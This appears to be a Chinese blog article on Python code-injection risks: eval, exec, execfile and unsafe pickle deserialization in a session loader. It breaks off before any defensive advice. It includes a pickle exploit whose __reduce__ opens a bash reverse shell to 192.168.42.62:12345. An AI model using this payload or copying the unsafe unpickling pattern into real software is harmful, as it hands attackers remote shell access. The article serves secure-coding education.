热门标签
热门文章
- 1STM32音频应用开发:DMA与定时器的高效协作
- 2【ChatGPT】人工智能发展的背后厉害:跌宕起伏的近百年_人工智能 chatgpt 神经元 可以 学习 的 无穷多
- 3在签出前,请清理仓库工作树_在签出前,请清理仓库工作树
- 4东北大学oj平台python答案_你觉得东北大学的Python考试怎么样?
- 5RabbitMQ实践——定制一致性Hash交换器的路由字段_mq交换机x-consistent-hash
- 6WebGL 绘制三角形示例
- 7自然语言处理(NLP)技术的详细介绍_nlp技术
- 8Android Studio创建应用_android studio创建一个应用程序
- 9docker国内镜像加速配置_国内docker镜像
- 10练习使用python-numpy的方法——东北大学大数据班数据挖掘Python基础二(1)_1.创建一个python脚本,命名为testl.py,完成以下功能。(1)定义一个列表list1
当前位置: article > 正文
Python安全编码 ——代码注入的实践与防范_python 代码注入
作者:秋刀鱼在做梦 | 2024-06-21 23:34:09
赞
踩
python 代码注入
什么是代码注入
代码注入攻击指的是任何允许攻击者在网络应用程序中注入源代码,从而得到解读和执行的方法。
Python中常见代码注入
能够执行一行任意字符串形式代码的eval()函数
eval("__import__('os').system('uname -a')")能够执行字符串形式代码块的exec()函数
exec("__import__('os').system('uname -a')")反序列化一个pickled对象时
pickle.loads("cposix\nsystem\np0\n(S'uname -a'\np1\ntp2\nRp3\n.")执行一个Python文件
execfile("testf.py")pickle.loads()代码注入
某不安全的用法:
- def load_session(self, session_id=None):
- if not session_id:
- session_id = self.gen_session_id()
- session = Session(session_id, self)
- else:
- try:
- data = self.backend.get(session_id)
- if data:
- data = pickle.loads(data)
- assert type(data) == dict
- else:
- data = {}
- except:
- data = {}
- session = Session(session_id, self, data)
- return session
注入的代码:
- >>> import os
- >>> import pickle
- >>> class exp(object):
- ... def __reduce__(self):
- ... s = "/bin/bash -c \"/bin/bash -i > \/dev/tcp/192.168.42.62/12345 0<&1 2>&1 &\""
- ... return (os.system, (s,))
- ...
- >>> e = exp()
- >>> e
- <__main__.exp object at 0x7f734afa8790>
- >>> k = pickle.dumps(e)
- 'cp
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/秋刀鱼在做梦/article/detail/744585
推荐阅读
相关标签
